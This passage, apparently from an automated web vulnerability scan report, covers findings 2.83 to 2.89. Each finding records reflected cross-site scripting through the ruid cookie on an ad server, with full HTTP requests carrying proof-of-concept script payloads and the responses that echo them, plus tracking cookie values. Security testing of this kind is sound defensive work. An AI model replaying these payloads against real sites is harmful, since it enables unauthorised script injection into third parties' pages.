Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=bb08b"-alert(1)-"f87da27032a; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3165011.js^2^1315404895^1315404918&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; ses15=12338^10&12590^8; rdk=7725/12338; rdk2=0; ses2=12338^15&12590^6

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:31:54 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:31:54 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=04e8588ddb95b3c4623aa79e6; expires=Wed, 07-Sep-2011 15:31:54 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=4e8588dd3e9c0c4d453ad2c4^&12338^12&12590^6; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=62885; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3199

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182363"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=bb08b"-alert(1)-"f87da27032a\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.83. http://optimized-by.rubiconproject.com/a/7725/12338/22682-15.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7725/12338/22682-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ca7d"-alert(1)-"738fbc0fe4e was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7725/12338/22682-15.js?cb=99484313&keyword=ndm|news.weather HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=5ca7d"-alert(1)-"738fbc0fe4e; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; rdk=7856/12590; rdk2=0; ses2=12338^3&12590^1; csi2=3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; cd=false; au=GSAE3LG5-KKTN-10.208.77.156; lm="7 Sep 2011 14:14:35 GMT"

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:07 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:15:07 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Wed, 07-Sep-2011 15:15:07 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^41&12590^3; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63892; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3211

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182366"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=5ca7d"-alert(1)-"738fbc0fe4e\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.84. http://optimized-by.rubiconproject.com/a/7725/12338/22682-2.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7725/12338/22682-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8e59"-alert(1)-"1786733ad33 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7725/12338/22682-2.js?cb=61189778&keyword=ndm|news.weather HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=b8e59"-alert(1)-"1786733ad33; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk15=0; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; rdk=7725/12338; rdk2=0; ses2=12338^2

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:49 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:14:49 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Wed, 07-Sep-2011 15:14:49 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^127&12590^2; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63910; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3251

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182363"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=b8e59"-alert(1)-"1786733ad33\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.85. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22782-15.html

Issue detail

The value of the ruid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eef72"><script>alert(1)</script>8a74264af07 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /a/7856/12590/22782-15.html?cb=0.3839801487047225&keyword=smh/news_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=eef72"><script>alert(1)</script>8a74264af07; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi2=3165011.js^1^1315404895^1315404895&3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; ses2=12338^6&12590^2; rdk=7725/12338; rdk15=0; ses15=12338^5&12590^3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:19:21 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:19:21 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588dd97f74c7a98e39cf2; expires=Wed, 07-Sep-2011 15:19:21 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=4e8588ddc30f9fd9f878d610^&12590^35; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63638; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2660

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=eef72"><script>alert(1)</script>8a74264af07" style="display: none;" border="0" height="1" width="1" alt=""/>
...[SNIP]...

2.86. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22782-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d90db"-alert(1)-"d0e5f6c768a was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7856/12590/22782-15.js?cb=0.7701902575790882&keyword=wa/news_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=d90db"-alert(1)-"d0e5f6c768a; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2081=OO-00000000000000000; rdk=7725/12338; rdk15=0; ses15=12338^2&12590^1; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:45 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:14:45 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588dd8e11c55ed6b14ad2; expires=Wed, 07-Sep-2011 15:14:45 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^112&12590^114; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63914; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2952

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182366"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=d90db"-alert(1)-"d0e5f6c768a\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.87. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22782-2.html

Issue detail

The value of the ruid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48c04"><script>alert(1)</script>028f1bd7c76 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /a/7856/12590/22782-2.html?cb=0.5008782960940152&keyword=smh/news_other HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=48c04"><script>alert(1)</script>028f1bd7c76; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; ses2=12338^3&12590^1; csi2=3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; cd=false; lm="7 Sep 2011 14:14:36 GMT"; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; rdk=7856/12590; rdk15=1; ses15=12338^3&12590^3; csi15=3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:14 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:16:14 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=04e8588ddfde552dd9c270269; expires=Wed, 07-Sep-2011 15:16:14 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^9&12590^50; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63825; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2971

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=48c04"><script>alert(1)</script>028f1bd7c76" style="display: none;" border="0" height="1" width="1" alt=""/>
...[SNIP]...

2.88. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22893-15.html

Issue detail

The value of the ruid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc3ca"><script>alert(1)</script>f299631d149 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /a/7856/12590/22893-15.html?cb=0.4898127138148993&keyword=wa/news_home&rf=http%3A//www.watoday.com.au/ HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1; ruid=bc3ca"><script>alert(1)</script>f299631d149; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; rdk=7725/12338; rdk15=0; ses15=12338^1; csi15=3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:37 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:14:37 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588dd8e11c55ed6b14ad2; expires=Wed, 07-Sep-2011 15:14:37 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^112&12590^67; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63922; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2959

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=bc3ca"><script>alert(1)</script>f299631d149" style="display: none;" border="0" height="1" width="1" alt=""/>
...[SNIP]...

2.89. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22893-2.html

Issue detail

The value of the ruid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 742b8"><script>alert(1)</script>a8c3bae217f was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /a/7856/12590/22893-2.html?cb=0.5778487676288933&keyword=wa/news_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
